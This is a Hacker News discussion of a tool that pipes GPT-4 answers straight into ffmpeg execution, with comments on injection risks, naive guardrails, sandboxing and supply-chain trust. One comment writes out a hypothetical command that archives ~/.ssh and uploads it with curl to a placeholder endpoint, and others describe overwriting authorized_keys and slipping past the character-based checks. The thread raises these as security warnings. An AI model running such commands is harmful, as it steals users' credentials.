Show HN: ffmpeg-english "capture from /dev/video0 every 1 second to jpg files" (github.com/dheera)
153 points by dheera 23 days ago | 99 comments



If you want this to be a little safer, instead of just those guardrails to prevent semicolons and such, you can split the command into an array of arguments, and use subprocess.Popen. It won't execute through a shell, so you don't have to worry about shell injection[1]. Though I'm sure there are unsafe ways to invoke ffmpeg anyway.

[1]: https://docs.python.org/3/library/subprocess.html#security-c...
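For illustration, a minimal sketch of that argument-list approach (the command string here is just a stand-in for whatever the model returns):

    import shlex
    import subprocess

    generated = "ffmpeg -f v4l2 -i /dev/video0 -vf fps=1 out_%04d.jpg"  # hypothetical model output

    args = shlex.split(generated)        # split into an argv list; no shell is involved
    assert args and args[0] == "ffmpeg"  # same guardrail idea, applied to argv[0]

    subprocess.run(args, check=True)     # spawns ffmpeg directly, not through /bin/sh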


I'd rather manually review every AI-generated command before running it.


I'm pretty sure you can dump a stream directly to a file without transcoding, the stream can be sourced from a URL, and the destination file can be the user's ssh authorized_keys


And the GPT-4 API would want to respond with an output to do that when that isn't what the user asked for?


I am almost certain one can find a seed+temperature pair that will result in such output given a non-malicious prompt.


And I am almost certain I could win $10M from a lottery ticket. I'm not worried about that actually happening though, because it is statistically never going to happen.

https://i.imgflip.com/3bhvio.jpg


On the contrary, it happens every time.


I'll start investing in the lottery right away, now that I know it is a sure thing. It is the difference between the cumulative probability of all tickets sold (which would be 100%) versus the discrete probability of a single ticket (0.000000003 for Powerball, basically zero).

The cumulative probability of every `ffmpeg-english` command ever sent to OpenAI will likely be <5%, if not <1%, of all of the possible responses GPT-4 could give.


If you couldn't win why would people buy tickets? It's like saying god doesn't exist.

I was just wondering what hilarious personal programming lottery stories people are not telling us.

I rolled short 6 digit random unique orderNumbers one time and dropped the leading zeroes. There is an order without a number now.


Or do a second query to ask whether the command is safe to execute.


Then do a third query to determine whether the answer to the second query was trustworthy.


still awaiting the induction step.


I really wish there was a native way to provide a suggested command to run next, and then let your own shell deal with it, after the user’s Enter keypress.


http://openinterpreter.com will just run commands for you


Please, do not use subprocess.Popen. Use something like plumbum, way safer and more robust.
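For anyone who hasn't seen it, a rough sketch of the plumbum equivalent (the arguments are illustrative):

    from plumbum import local

    ffmpeg = local["ffmpeg"]  # resolves the binary on PATH
    # Arguments are a list, so there is no shell and no quoting to get wrong;
    # a non-zero exit raises ProcessExecutionError instead of failing silently.
    ffmpeg["-f", "v4l2", "-i", "/dev/video0", "-vf", "fps=1", "out_%04d.jpg"]()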


If you can make a python program which only uses stdlib, it becomes wonderfully portable and easy to work with. Also, significantly more people use stdlib, there is more knowledge on the internet, and xz-style supply chain attacks are significantly less likely.

This is why my advice to everyone is to use python's stdlib as much as possible, and avoid using Python's external libraries unless they significantly simplify code.

Plumbum seems nice (and also is packaged in debian/ubuntu, which is a plus), but it does not seem to be significantly safer than correctly written subprocess code, and it won't even save that many lines in this particular example.


I agree and disagree. Python's subprocess has been the source of many unfortunate, time-consuming bugs among users who think they are properly executing external commands but in the end don't realize their logic is full of errors, with no indication that something went wrong.

I agree that a standard interface is always better, but not at the cost of productivity. A better interface than the current subprocess one is needed, and I think plumbum is the direction to go.


I am curious which errors you find most problematic. We have an internal codebase with hundreds of developers, and we haven't observed many subprocess-related bugs. And the ability to print the command being executed (via shlex.join) so it can be copied into a shell and debugged there is very nice.

That said, there are a bunch of rules in our internal style guide about this process, such as: avoid shell=True unless you need shell functionality and know how shell quoting works; use python instead of tools like grep/head/aws/etc. when performance permits; check returncode after Popen calls; correctly quote ssh args (they are tricky!)
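For instance, the copy-pasteable logging plus the returncode check looks roughly like this (command is illustrative):

    import shlex
    import subprocess

    args = ["ffmpeg", "-i", "in.mp4", "-vf", "scale=-2:720", "out.mp4"]
    print("running:", shlex.join(args))  # paste this into a shell to debug by hand

    proc = subprocess.Popen(args)
    proc.wait()
    if proc.returncode != 0:
        raise RuntimeError(f"ffmpeg exited with code {proc.returncode}")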


quoting is the enemy.


shlex.quote all the things. So many dumb problems solved trying to manually escape shell commands.
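e.g. when you really do need to build a shell string (the filename is illustrative):

    import shlex

    path = "my clip (final) [1080p].mp4"
    cmd = "ffmpeg -i " + shlex.quote(path) + " out.mp4"  # safe despite spaces, parens, brackets
    print(cmd)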


I recommend `??` from GitHub Copilot. It's basically this, but for any command, not just ffmpeg. I use it all the time. And it asks for confirmation to execute the command :)

https://githubnext.com/projects/copilot-cli/


How long until someone finds a way to maliciously SEO-ify these tools and cause remote code execution incidents? Is it less malicious if the script only does marketing things instead of more serious harm?

What safeguards are in place to sanitize the output of copilot? I ask this because of course a more experienced user might do that sanitization or sandbox testing themselves, but they probably wouldn't get much use out of copilot in the first place.


There's also aichat's shell integration [1]. Instead of typing a command I describe what I want in plain English in a terminal and then press Alt-E. It replaces the text with a command.

[1] https://github.com/sigoden/aichat/tree/main/scripts/shell-in...


Seems like it now defaults to `ghcs` and `ghce` instead of `??`, `git?` and `explain`. It took me a while to figure that out.


indeed - and because it's a special character you need to do something like this to replicate the ?? shortcut.

  alias \?\?="gh copilot suggest"


> temperature=0.5

Why not 0?

I’m not a prompt engineer so I never worked with the API, but I thought the “temperature” was a little knob they added for variety in responses. Is that what you want in a CLI?


Good question! I used 0.5 out of habit, but I do need to do some more experimenting with this parameter. But yes, intuitively it should probably be low. I'll do some experiments in the morning and see if it works well at 0.
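For reference, pinning the temperature is a one-line change in the API call; the model name and prompts below are placeholders rather than exactly what the script uses:

    from openai import OpenAI

    client = OpenAI()  # reads OPENAI_API_KEY from the environment

    resp = client.chat.completions.create(
        model="gpt-4",   # placeholder
        temperature=0,   # always take the most likely tokens
        messages=[
            {"role": "system", "content": "Reply with a single ffmpeg command and nothing else."},
            {"role": "user", "content": "capture from /dev/video0 every 1 second to jpg files"},
        ],
    )
    print(resp.choices[0].message.content)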


Non-zero temperature does have a load-bearing function, allowing escape from states where the next token is always the same. You can kinda think of it as a dither.


Are single prompt python wrappers Show HN noteworthy now?


Not only that, they might secure a seed round.


I thought this was meant to be a joke or something, but judging from OPs comments here it doesn't look like it. And the people cheering this on...

It's a bleak future for anyone with even a passing interest in software security.


Or a very bright one in those looking to exploit bad software.


Terrible idea, I love it

This is a good use case for a well-trained LLM, rather than the broad scope of ChatGPT


It's not a good use case for anything.

Never ask a remote endpoint that's not owned by you and not run by you, what commands you should run on your system. Certainly don't execute the answers.


99.9999% of the code running on my machine is written by others and not even readable to me. I'm pretty optimistic that a similar percentage is true on your machines. So yeah, we run remote commands all the time, all of us. There may be a subtle difference between "curl something | bash" and "apt-get install" or "setup.exe", but there is no fundamental one.


Fundamentally:

1. the packages being worked on by Debian et al have a huge pile of infrastructure so that their development happens collaboratively and in the open, with many eyes watching

2. everyone gets the same packages

3. they have their own security teams to _ensure_ everyone is getting the same packages, i.e. that their download servers and checksums haven't been compromised

4. the project has been working since 1993 to ensure their update system, and the system delivered by those updates, works as expected. If it doesn't, there are IRC channels, mailing lists, bug trackers and a pile of humans to discuss issues with, and if they agree it's a bug, they can fix it for everyone

It's not to say it's impossible to sneak an attack past a project dedicated to stopping such attacks, but it's so much more work compared to attacking someone who executes whatever a remote endpoint tells them


There have been many documented cases of supply chain attacks of various degrees of sophistication. Some of them successful, some of them almost successful. May I remind you that the recent xz vulnerability was discovered by a single dev by mere chance.

As an end user it is nearly impossible to guard against such an attack.

It can be problematic to run something like `curl foo.com | bash` without inspection of the script first. But even here it makes a difference if you are curling from a project like brew.sh that delivers such script from a TLS protected endpoint or some random script you find somewhere in a gist.

Same goes for output from an LLM. You can simply investigate the generated command before executing it. Another strategy might be to only generate the parameters and just pass those to the ffmpeg executable.
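A rough sketch of that parameters-only strategy (the JSON-array convention here is hypothetical, not what the posted script does):

    import json
    import subprocess

    # Suppose the model is told to answer with only a JSON array of ffmpeg arguments, e.g.
    model_output = '["-f", "v4l2", "-i", "/dev/video0", "-vf", "fps=1", "out_%04d.jpg"]'

    args = json.loads(model_output)
    assert all(isinstance(a, str) for a in args)

    # The executable is fixed by us; the model only chooses ffmpeg's arguments
    subprocess.run(["ffmpeg", *args], check=True)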


> Same goes for output from an LLM

This is the crux of our disagreement. It does not go the same. You have no idea what the LLM is going to write, neither does the LLM, nor the people who created the LLM.

At no point did the people who created the LLM actually think about your use-case, nor did the LLM, and there is no promise of anything you ask getting a correct, or even consistent answer. The creators don't know how the answers got there, and can't easily fix them if they're wrong. You'd be a fool to trust it for anything other than dog and pony shows.


> This is the crux of our disagreement.

No it's not.

There is an observable and testable probability that an LLMs output is correct or false. There is an observable and testable probability that code created by humans is erroneous.

There is a third category where human code is malicious. You will need to guard against all three cases. Guarding against a possibly faulty LLM output that is passed to ffmpeg is significantly easier to realise through defensive prompting and simple sanitization techniques, than to protect against a malicious state actor that is capable of crafting sophisticated supply chain attacks that took years to develop and roll out (again see the xz backdoor).

The idea that you can blindly trust an open source project just because "their development happens collaboratively and in the open" is naive. Some open source projects people are building their whole infrastructure on are maintained by a single developer in their spare time. The attack surface is huge and has been exploited time and time again. Just because a project like Debian has signed packages and a security team doesn't guarantee that the underlying code doesn't have some malicious backdoor or some grave bug that creates a big attack surface.


Nobody said anything about blind trust, but that's what's being exhibited here, in trusting the output of a stochastic parrot that can't even reason.

You've _really_ shifted the goalposts here.

Do you trust in _your_ ability, to what you think requires no more than "defensive prompting and simple sanitization techniques"... to be robust against, say "a malicious state actor that is capable of crafting sophisticated supply chain attacks"?

You know there's not just one, right? And you know if you're consuming a closed product, you can't even verify its correctness for yourself, let alone be able to tell if a "malicious state actor" is actually the one sending you LLM answers. You can't follow along with the development process. Its actors don't make their changes in public. You can't look back at a history of all their actions.

A "malicious state actor" would laugh at your "simple sanitization" and use logic and reason to know where your code is vulnerable and change what you think will be an ffmpeg command into something that actually probes your network, downloads all the files, encrypts them and posts you a ransom note from your own mailservers.

When both scenarios have bad actors and attack surfaces, which would you rather do:

1. Look up the ffmpeg manual, or ask a search engine and find StackOverflow answer, or heck even ask an LLM... but then go through the manual and _understand the command_ you're running, and what its human authors have written about its capabilities. Ensure you use the correct settings and you know what they do and you've reasoned as to why they're correct - and put that in your script.

2. Make no attempt to understand ffmpeg. Put a command in your script that makes a network call to a proprietary service you don't control, and 100% put your faith that it _always_ returns the correct command for the same prompt - each time you run it. And that service never gets interrupted. And that service is never hacked, nor its staff compromised, nor its models poisoned, etc.

Honestly, this is as braindead as people using PHP fopen() to access URLs for files they could host locally.

EDIT: bonus question. Would you ask an LLM "please send me an ffmpeg binary for linux x86_64 that automatically splits the output from /dev/video0 into timeslices" ? If it gave you a binary back, would you run it in preference to the normal ffmpeg binary with a provenance of where it came from?


I'd say "discovered by a single dev" is not just mere chance, but system working as designed.

- Everyone was getting the same package, so one person could warn others

- There were well-established procedures for code updates (Andres Freund _knew_ that xz was recently updated, and could go back and forth in previous versions)

- There was access to all steps of the process - git repo with commit history, binary releases, build scripts, extensive version info

None of this is true for LLMs (and only some of this is true for curl|bash, sometimes) - it's an opaque binary service for which you have no version info, no history, and everyone gets a highly customized output. Moreover, there have been documented examples of an LLM giving flawed code with security issues and (unlike debian!) everyone basically says "that person got unlucky, this won't happen to me" and keeps using the very same version.

So please don't compare traditional large open-source projects with LLMs - their risk profiles are very different, and LLMs are way more dangerous.


There's a difference between getting code from a repo, and from AI generator though. We can apply an ancient thing known as "reputation" to the former. Not yet to the latter.


If we can't let ChatGPT take the wheel, how will we feel alive?


I do envision training a local LLM which would mostly resolve this concern, but at the moment the vast majority of people don't have a good enough GPU in their system to run an even mildly-competent code generation LLM, but I imagine this will change within a few years.


You never search for documentation? From either a first or third party site?


got it, never do apt-get upgrade


Why do you say it's a terrible idea?

I'd say it's a pretty common idea today to ask chatGPT for help in complicated commands. Putting it in the shell directly is smart and helpful.

Maybe the implementation has some flaws (it seems quite unsafe), but the idea is rather good in my opinion.


Getting a suggested command from a chat bot is not a terrible idea.

Directly executing commands given by a chat bot on your machine without inspecting them first is pure madness.


Here's a hypothetical but very real scenario: someone discovers a vulnerability in openAI's API (vulnerabilities are everywhere these days), you prompt it to do something for you and it sends the following command:

tar -czf bla.tar.gz ~/.ssh && curl -X POST -F "ssh_keys=@bla.tar.gz" SOME_HTTP_API_ENDPOINT && rm -f bla.tar.gz && THE_ACTUAL_COMMAND_YOU_PROMPTED

What could possibly go wrong, right?


you'd really like http://openinterpreter.com then


I'm not quite ready to execute arbitrary output from an LLM. Maybe with more guardrails and if it could guarantee it would only operate inside of a chosen folder, and would back up the folder ahead of time.


One relatively easy way to be safe is to do this inside a docker container with only whatever files you're working with mounted inside.
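Roughly something like this, assuming the generated command is an argument list (the image and mount path are illustrative):

    import subprocess

    workdir = "/home/me/videos"               # the only directory the command can touch
    ffmpeg_args = ["-i", "/work/in.mp4", "/work/out.mp4"]

    subprocess.run([
        "docker", "run", "--rm",
        "--network", "none",                  # no network access
        "-v", f"{workdir}:/work",             # mount only the working directory
        "linuxserver/ffmpeg",                 # any image whose entrypoint is ffmpeg
        *ffmpeg_args,
    ], check=True)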

I created a new script (https://github.com/dheera/scripts/blob/master/helpme) that is more general, and is safer by presenting the command and requiring you to type "y" to execute, and does NOT auto-execute after a delay.

That said, I do believe we are re-living the autonomous car question of "what about the 0.000001%" again and in this case the absolute worst that happens is it wipes your system, and that's a disaster that's extremely easy to prepare for. You could do all your work in a VM and take daily snapshots, among other solutions.

As long as the computer isn't wired up to some weapon, I say deploy now, let's not wait a decade. This world is too awesome to pass up just because of some "rm -rf" level risks. If that happens I'll just kick myself for not buying a lottery ticket because the probability of ChatGPT responding to an ffmpeg question with "rm -rf" is far, far lower than winning the lottery.


While I am concerned about the rm -rf possibility and that's what my initial comment was about, it's not the only concern. I'm also concerned ChatGPT will return a ffmpeg command that is functional but suboptimal, creating a product that's subtly wrong. For example, a slideshow that's subtly misordered, a video file that's 10x the size it needs to be, compromised audio quality, or a video that runs fine on my PC but has poor portability (video players can be surprisingly finicky). When I look up ffmpeg commands on stackexchange, there's always feedback on any suggested command that explains what's wrong with it and what a better solution is. Often the first solution will work, but maybe only with certain ffmpeg distributions or there are major caveats to the result.

I do appreciate the container solution, since it's generalizable to other ai-powered tools in this class.


can't decide what is better?

1) curl | sh

2) llm | sh



Using curl is surprisingly secure if you have a secure, trusted target. An LLM could be safe the first 99 times and then randomly wipe your hard drive. It's basically the same thing as curl but just randomly picking what you download, like that one thing that picked random code from Stack Overflow.


> Using curl is surprisingly secure

one thing to remember is that you can make a server respond one thing when a user does "curl <url>" and another thing when the users does "curl <url> | sh":

https://lukespademan.com/blog/the-dangers-of-curlbash/

another thing to know is that github.com/<org>/<proj>/[...somethings...] isn't necessarily controlled by <org>:

https://vulcan.io/blog/github-comment-malware-what-you-need-...


Also, if entropy decides you are unworthy and the download dies after reading "rm -Rf /" instead of the full line "rm -Rf /tmp/setup" then you're going to have a bad time on any Linux that doesn't have preserve-root by default. Of course such deleterious incomplete command execution could take many forms.


This is trivially prevented by wrapping the body in a function that is executed only on the last line of the script. I don't think I've seen a "curl | sh" script in the wild that wasn't written that way.


Yes but you could do something equivalent with a binary you download or some remote repository like a brew keg too. At the end of the day you need to decide whether you trust who you’re downloading from or not and ‘curl … | sh’ isn’t practically worse in any way I can think of.


> An LLM could be safe the first 99 times and then randomly wipe your hard drive.

So like, has anyone ever actually done enough fuzzing to see if this or other actually bad commands ever happen in practice, or are we just going on vibes here? I suppose it's possible that you give it a text description to do something bad and it does, but I'm actually curious if this is just 'llms bad' vibes.


Not intentionally, but it's given me incorrect SQL that feels one step away from something incredibly dangerous


invoke-undefined-behaviour | sh

We live in times where you shouldn't use C or C++ because undefined behavior can eat your face and there are general memory safety issues, but at the same time let's pipe LLM output straight to your shell.

It is causing a little tingling in my heart.


forgot '3) apt-get install -y package; bin-from-package'


Absolutely so insane it's kinda funny. I think that's the point.


What I want is for Chat AI to be a fallback.

I want to say “frogblast the vent core” and the interface either parses it locally like they always have for years, or says “I don’t understand. Should I ask GPT?”

I also want it to be more about “help me get the code and show me what it means.” I love Regexr that shows you what each part of the regex does. I’d love for it to annotate what each part of the ffmpeg command does.



Stuff like this makes me wonder if we could apply what we've learned from llm/ml and apply it to a less leak-y abstraction like a node or graph based interface. Fewer chances for hallucinations and a more manageable, finite dataset.


This is what llm cmd does for any command, and it also offers a chance to edit it before running

https://github.com/simonw/llm-cmd


I've been using shell-gpt[1] for the same, and it is almost irritatingly useful. I fear that my somewhat decent shell-fu is going to atrophy pretty rapidly in this new world.

in my experience, this is the kind of thing that LLMs are great for - small, one-off tasks with clearly defined parameters. (and, with careful application - low stakes.)

[1]: https://github.com/TheR1D/shell_gpt


If you've used any "new" terminal - like Warp [1] (which requires you to log in to use, wtf) or Wave Terminal [2] (open source and bring-your-own-AI is supported) - you'll be very familiar with this style of AI-driven completion.

I do use it sometimes, but I am very very careful in reviewing what the command does before blindly copy pasting it into the cli

[1] https://www.warp.dev [2] https://www.waveterm.dev/


Very cool!

It does make me think about enterprise usages of LLMs though - the rule I have in my mind is "given a user prompt, only perform a query OR suggest commands, do not execute commands" (in a CQRS sense of the words query and command).

Without some kind of principle like that, I really cannot do much with LLMs on the user interface side because I'll be worried it might f something up every so often.


Author here!

I just made a more generalized version for ALL commands: https://github.com/dheera/scripts/blob/master/helpme

I've made it safer in that it doesn't auto-execute the command and defaults to "no". You inspect the command and type "y" to execute.


It would be cool to write some tests to see how often it works out. I have noticed that LLMs often create command line options that don't exist.

Security aside, I bet it would work more often than when I input something in the terminal.

A nice feature would be to just loop back the error and get ChatGPT to correct it. You could do this by running the command with bash -n (syntax check) and only running the script once that doesn't return an error.
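Something like this, as a sketch (ask_gpt is a stand-in for whatever wrapper calls the chat API):

    import subprocess

    def generate_checked_command(request, ask_gpt, max_tries=3):
        prompt = request
        for _ in range(max_tries):
            command = ask_gpt(prompt)  # hypothetical wrapper around the chat API
            check = subprocess.run(["bash", "-n"], input=command,
                                   text=True, capture_output=True)
            if check.returncode == 0:
                return command         # syntactically valid; still review before running
            prompt = (request + "\n\nYour previous answer failed `bash -n`:\n"
                      + check.stderr + "\nPlease correct it.")
        raise RuntimeError("no syntactically valid command after several attempts")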

Three months from now the next cloud outage at Google will be from “helpme delete that one weird file”.

May the lord have mercy on our machines.


> A nice feature would be to just loop back the error and get ChatGPT to correct it.

For code generation this works well, though for the command line some additional function-calling infrastructure may be necessary, e.g. if it gets a file path wrong, its only way to correct it might be to execute a bunch of 'ls' commands. It might need read access to the system, which is okay for some use cases where you can containerize everything and keep private files out, but that opens another can of worms :-/


Came here to suggest this should be generic, but I'd also do something like pack `man <command>` into the prompt if you are one-shotting. Then it works for "all" commands that have a man page rather than just the commands GPT knows about from before its cutoff. Even just trying to scrape out `<command> --help` or something would be good too.
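As a sketch, something along these lines (the prompt wording is made up):

    import subprocess

    def build_prompt(tool, request):
        # Prefer the man page; fall back to `--help` if there isn't one
        man = subprocess.run(["man", tool], capture_output=True, text=True)
        docs = man.stdout if man.returncode == 0 else subprocess.run(
            [tool, "--help"], capture_output=True, text=True).stdout
        # Real man pages (ffmpeg's especially) can be huge; you'd probably truncate or summarize
        return (f"Here is the documentation for {tool}:\n\n{docs}\n\n"
                f"Write a single {tool} command that does the following: {request}")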


This is very bad. Like really bad.


I needed to speed up a video by dropping 9 out of every 10 frames yesterday. It took all of 30 seconds to type my request into GPT and paste the result, and I could inspect it before executing. I don't see how this is helpful.


If you are concerned about security risks, just add a confirm CLI prompt before running, to ask the user to confirm whether to execute the code (Y/N)
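e.g. a tiny sketch:

    import shlex
    import subprocess

    command = "ffmpeg -i in.mp4 out.webm"      # whatever the model suggested
    print("Suggested command:\n  " + command)
    if input("Execute? [y/N] ").strip().lower() == "y":
        subprocess.run(shlex.split(command))
    else:
        print("Aborted.")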


> "Makes ffmpeg easier to use by accepting plain English."

Interesting, any testing? Applications? Efficacy demonstrations?


/dev/video0 seems weirdly out of place there; it's like going straight from the '80s to the 2020s.

Maybe "capture from webcam..."


That's how it still works. I asked Claude the same example request and it gave me the below which worked perfectly with my logitech webcam.

    while true; do
      ffmpeg -f v4l2 -r 1 -i /dev/video0 -vframes 1 -f image2 output_%04d.jpg
      sleep 1
    done


What if you have multiple webcams?


I have multiple webcams on my system -_- but yeah if you write "from webcam" it should work just fine, though it will be guessing at /dev/video0

The cool thing is that tab completion for /dev/video0 actually works as you're typing the sentence.


I suppose LLM injection vulnerability will be the next security product trend


Using GPT-4-turbo or GPT-4o would probably be better than using the old GPT-4.


You should at least wrap the ffmpeg calls in a systemd-run command with restricted internet access, ro-filesystem except /tmp, etc.

It's super easy to prevent AI from becoming skynet, or even just to stop it from running rm -rf /, but you have to understand proper system security; use namespaces and VMs, please.
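A rough sketch of the systemd-run wrapper (property names are from systemd.exec; the exact choices need tuning, and some of these require running via the system manager, i.e. root):

    import subprocess

    ffmpeg_args = ["-i", "in.mp4", "out.mp4"]  # illustrative

    subprocess.run([
        "systemd-run", "--pipe", "--wait",
        "-p", "PrivateNetwork=yes",       # no network access
        "-p", "ProtectSystem=strict",     # read-only filesystem...
        "-p", "ReadWritePaths=/tmp",      # ...except /tmp
        "-p", "PrivateTmp=yes",
        "ffmpeg", *ffmpeg_args,
    ], check=True)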


> It super easy to prevent AI from becoming skynet

If only. It will only take one hapless script to bring about judgement day.


It will be called “In Conclusion Day”.


generic llm will do that for you, no?


How have we gone from “the internet routes around damage” to “just connect it to a hallucinating, equivocating galaxy brain controlled by people who swear their employees to silence”?


the real damage is remembering ffmpeg command line options. So I think the internet is working as intended


I agree the ffmpeg command line requires a postdoc, but that's why we have (deterministic, predictable) GUIs.


I really don't understand what makes people complain about ffmpeg options so much. The only problem I ever have with it is that I use it so rarely that I usually need a refresher every time I use it for anything that isn't trivial, but that would still be true with any parameter style.


Well, they ran out of unicorns and rainbows at the LLM factory, so we're stuck with that one.


…by sending your request to the ChatGPT API and then executing the result.

What could possibly go wrong?


But it has "security"

    assert(ffmpeg_command.startswith("ffmpeg"))
    assert(";" not in ffmpeg_command)
    assert("|" not in ffmpeg_command)
:D

Surely there's no way to avoid those checks... /s


> assert(";" not in ffmpeg_command)

Well that just made it considerably less useful given that ; is the delimiter in ffmpeg filtergraphs.

Also it doesn't defend against && || \n etc.

Invoking an untrusted string with sh (through os.system()) is kind of a facepalm when you can easily shlex and posix_spawn it.


So what kind of scenario do you have in mind?



